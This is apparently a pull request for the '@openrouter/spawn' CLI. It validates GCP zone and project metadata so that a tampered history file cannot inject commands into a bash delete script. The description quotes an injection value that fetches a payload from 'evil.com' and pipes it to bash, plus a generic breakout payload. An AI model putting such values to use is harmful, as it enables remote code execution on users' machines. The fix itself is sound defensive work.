### PR TITLE
security: validate GCP metadata in delete script to prevent command injection

### DIFF
--- a/cli/package.json
+++ b/cli/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@openrouter/spawn",
-  "version": "0.5.4",
+  "version": "0.5.5",
   "type": "module",
   "bin": {
     "spawn": "cli.js"

--- a/cli/src/commands.ts
+++ b/cli/src/commands.ts
@@ -17,7 +17,7 @@ import {
 } from "./manifest.js";
 import pkg from "../package.json" with { type: "json" };
 const VERSION = pkg.version;
-import { validateIdentifier, validateScriptContent, validatePrompt, validateConnectionIP, validateUsername, validateServerIdentifier } from "./security.js";
+import { validateIdentifier, validateScriptContent, validatePrompt, validateConnectionIP, validateUsername, validateServerIdentifier, validateMetadataValue } from "./security.js";
 import { saveSpawnRecord, filterHistory, clearHistory, markRecordDeleted, getActiveServers, getHistoryPath, type SpawnRecord, type VMConnection } from "./history.js";
 import { buildDashboardHint, EXIT_CODE_GUIDANCE, SIGNAL_GUIDANCE, type ExitCodeEntry, type SignalEntry } from "./guidance-data.js";
 
@@ -1788,6 +1788,9 @@ function buildDeleteScript(cloud: string, connection: VMConnection): string {
     case "gcp": {
       const zone = connection.metadata?.zone || "us-central1-a";
       const project = connection.metadata?.project || "";
+      // SECURITY: Validate metadata values to prevent command injection via tampered history
+      validateMetadataValue(zone, "GCP zone");
+      validateMetadataValue(project, "GCP project");
       return `${sourceLib}\nensure_gcloud\nexport GCP_ZONE="${zone}"\nexport GCP_PROJECT="${project}"\ndestroy_server "${id}"`;
     }
     case "aws":


### PR DESCRIPTION
**Why:** Unvalidated `connection.metadata.zone` and `connection.metadata.project` values from `~/.spawn/history.json` are interpolated directly into a bash script string in `buildDeleteScript()`, allowing command injection if the history file is tampered with. A crafted zone value like `"; curl evil.com/payload | bash; echo "` would escape the double-quoted export and execute arbitrary commands.

## Changes

- **`cli/src/security.ts`**: Add `validateMetadataValue()` — allowlist validator for metadata fields (alphanumeric, hyphens, underscores, dots only; max 128 chars)
- **`cli/src/commands.ts`**: Call `validateMetadataValue()` on GCP `zone` and `project` before interpolating into bash script in `buildDeleteScript()`
- **`cli/package.json`**: Bump version 0.5.4 -> 0.5.5

## Attack vector

1. Attacker tampers with `~/.spawn/history.json` (via symlink attack, compromised script, or direct modification)
2. Sets `connection.metadata.zone` to `"; malicious_command; echo "`
3. User runs `spawn delete` to clean up a GCP server
4. The unvalidated zone value is interpolated into `export GCP_ZONE="..."` in a bash `-c` string
5. Shell metacharacters break out of the quotes and execute arbitrary commands

## Defense

The fix applies the same allowlist validation pattern used for `validateServerIdentifier()` and `validateUsername()` — blocking shell metacharacters (`;`, `&`, `|`, `$`, `` ` ``, `"`, `'`, etc.) before the values reach bash.

Note: `ip`, `user`, `server_id`, and `server_name` were already validated in `mergeLastConnection()`, but `metadata` fields were missed.

## Test plan

- [x] All 324 existing security and commands tests pass
- [ ] Verify `spawn delete` still works for GCP servers with valid zone/project
- [ ] Verify tampered metadata values are rejected with clear error message